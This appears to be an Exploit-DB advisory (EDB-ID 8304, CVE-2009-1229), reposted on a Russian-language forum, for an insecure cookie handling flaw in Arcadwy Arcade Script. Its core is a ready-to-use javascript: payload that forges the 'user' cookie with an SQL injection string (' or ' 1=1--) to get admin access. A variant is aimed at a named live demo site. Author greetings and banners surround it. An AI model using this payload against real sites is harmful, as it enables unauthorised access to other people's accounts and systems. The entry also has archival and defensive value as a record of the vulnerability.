- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8304
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1229
- Дата публикации
- 2009-03-29
Код:
[~] Arcadwy Arcade Script (for ByPass) Insecure Cookie Handling Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 29.03.2009
[~]
[~] Home: yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: BasImIz Sagolsun, Muhsin YazIcIoglu Ulkemiz ve Ulkumuz icin Buyuk Kayýp Allah Rahmet Eylesin :((
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: My New Target Buffer Overflow :) There is a little time xD
[~]
[~] -----------------------------------------------------------
Demo:
http://games.arcadwy.com/
Exploit:
javascript:document.cookie = "user=[admin_id],' or ' 1=1--; path=/";
Exploit for demo:
javascript:document.cookie = "user=1,' or ' 1=1--; path=/";
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2009-03-29]- Источник
- www.exploit-db.com
